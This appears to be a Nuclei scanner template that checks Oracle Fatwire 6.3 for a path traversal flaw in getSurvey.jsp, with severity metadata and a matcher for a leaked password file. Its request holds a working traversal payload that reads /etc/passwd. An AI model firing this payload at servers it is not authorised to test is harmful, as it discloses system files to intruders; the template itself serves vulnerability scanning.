id: oracle-fatwire-lfi

info:
  name: Oracle Fatwire 6.3 - Path Traversal
  author: Bernardo Rodrigues @bernardofsr
  severity: high
  description: |
    Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
  reference:
    - https://www.exploit-db.com/exploits/50167
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: lfi,oracle,fatwire,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
